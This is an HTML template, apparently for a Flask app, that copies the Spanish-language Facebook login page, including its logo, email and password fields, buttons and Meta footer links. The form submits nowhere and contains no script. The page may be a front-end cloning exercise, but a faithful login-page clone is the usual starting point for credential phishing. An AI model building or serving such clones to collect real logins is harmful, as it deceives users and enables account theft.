<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Facebook - Entrar o registrarse</title>
  <link rel="preconnect" href="https://fonts.gstatic.com">
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="{{ url_for('static', filename='css/login.css') }}">
</head>

<body>
  <main>
    <div class="row">
      <div class="col-logo">
        <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="Logo">
        <h2>Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</h2>
      </div>
      <div class="col-form">
        <div class="form-container">
          <input type="text" placeholder="Correo electrónico o número de teléfono">
          <input type="password" placeholder="Contraseña">
          <button class="btn-login">Iniciar sesión</button>
          <a href="#">¿Has olvidado la contraseña?</a>
          <button class="btn-new">Crear cuenta nueva</button>
        </div>
        <p><a href="#"><b>Crea una página</b></a> para un famoso, una marca o una empresa.</p>
      </div>
    </div>
  </main>
  <footer>
    <div class="footer-contents">
      <ul class="ul-primary">
        <li>Español (España)</li>
        <li><a href="https://www.facebook.com/">English (US)</a></li>
        <li><a href="https://pt-br.facebook.com/">Português (Brasil)</a></li>
        <li><a href="https://fr-fr.facebook.com/">Français (France)</a></li>
        <li><a href="https://it-it.facebook.com/">Italiano</a></li>
        <li><a href="https://de-de.facebook.com/">Deutsch</a></li>
        <li><a href="https://ar-ar.facebook.com/">العربية</a></li>
        <li><a href="https://zh-cn.facebook.com/">中文(简体)</a></li>
        <li><a href="https://hi-in.facebook.com/">हिन्दी</a></li>
        <li><a href="https://ja-jp.facebook.com/">日本語</a></li>
        <li><a role="button" rel="dialog" href="#" title="Mostrar más idiomas"><i
              class="img sp_8oGPGkzB8ig sx_fc06b0"></i></a></li>
      </ul>
      <ul class="ul-secondary">
        <li><a href="/reg/" title="Regístrate en Facebook">Registrarte</a></li>
        <li><a href="/login/" title="Iniciar sesión en Facebook">Iniciar sesión</a></li>
        <li><a href="https://messenger.com/" title="Consultar Messenger.">Messenger</a></li>
        <li><a href="/lite/" title="Facebook Lite para Android.">Facebook Lite</a></li>
        <li><a href="https://www.facebook.com/watch/" title="Explorar en Vídeo">Vídeo</a></li>
        <li><a href="/places/" title="Consulta lugares populares en Facebook.">Lugares</a></li>
        <li><a href="/games/" title="Consulta los juegos en Facebook.">Juegos</a></li>
        <li><a href="/marketplace/" title="Compra y vende artículos en Facebook Marketplace.">Marketplace</a></li>
        <li><a href="https://pay.facebook.com/" title="Más información sobre Meta Pay">Meta&nbsp;Pay</a></li>
        <li><a href="https://www.meta.com/" title="Finalizar compra en Meta">Meta Store</a></li>
        <li><a href="https://www.meta.com/quest/" title="Más información sobre Meta Quest">Meta Quest</a></li>
        <li><a href="https://imagine.meta.com/" title="Imagine with Meta AI" rel="noreferrer nofollow">Imagine with Meta
            AI</a></li>
        <li><a href="https://www.instagram.com/" title="Echa un vistazo a Instagram"
            rel="noreferrer nofollow">Instagram</a></li>
        <li><a href="https://www.threads.net/" title="Consultar Threads">Threads</a></li>
        <li><a href="/fundraisers/" title="Haz una donación a causas que te importan.">Recaudaciones de fondos</a></li>
        <li><a href="/biz/directory/" title="Busca en nuestro directorio de servicios de Facebook.">Servicios</a></li>
        <li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
            title="Consulta el centro de información de votación.">Centro de información de votación</a></li>
        <li><a href="/privacy/policy/?entry_point=facebook_page_footer"
            title="Obtén más información sobre cómo recogemos, usamos y compartimos datos para ayudar a Facebook.">Política
            de privacidad</a></li>
        <li><a href="/privacy/center/?entry_point=facebook_page_footer"
            title="Obtén más información sobre cómo  administrar y controlar tu privacidad en Facebook.">Centro de
            privacidad</a></li>
        <li><a href="/groups/discover/" title="Explora nuestros grupos.">Grupos</a></li>
        <li><a href="https://about.meta.com/"
            title="Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo.">Información</a>
        </li>
        <li><a
            href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto"
            title="Anúnciate en Facebook.">Crear anuncio</a></li>
        <li><a href="/pages/create/?ref_type=site_footer" title="Crear una página">Crear página</a></li>
        <li><a href="https://developers.facebook.com/" title="Desarrolla en nuestra plataforma.">Desarrolladores</a>
        </li>
        <li><a href="https://www.facebook.com/careers/" title="Únete a nuestra extraordinaria empresa.">Empleo</a></li>
        <li><a href="/policies/cookies/" title="Información sobre las cookies y Facebook.">Cookies</a></li>
        <li><a href="https://www.facebook.com/help/568137493302217"
            title="Más información sobre Gestión de anuncios">Opciones de anuncios<i
              class="img sp_8oGPGkzB8ig sx_218f74"></i></a></li>
        <li><a href="https://www.facebook.com/policies"
            title="Consulta nuestras políticas y condiciones.">Condiciones</a></li>
        <li><a href="https://www.facebook.com/help/" title="Visita nuestro servicio de ayuda.">Ayuda</a></li>
        <li><a href="help/637205020878504" title="Visita nuestro aviso para subir contactos y no usuarios.">Subir
            contactos y no usuarios</a></li>
      </ul>
      <small>Meta © 2024</small>
    </div>
  </footer>
</body>

</html>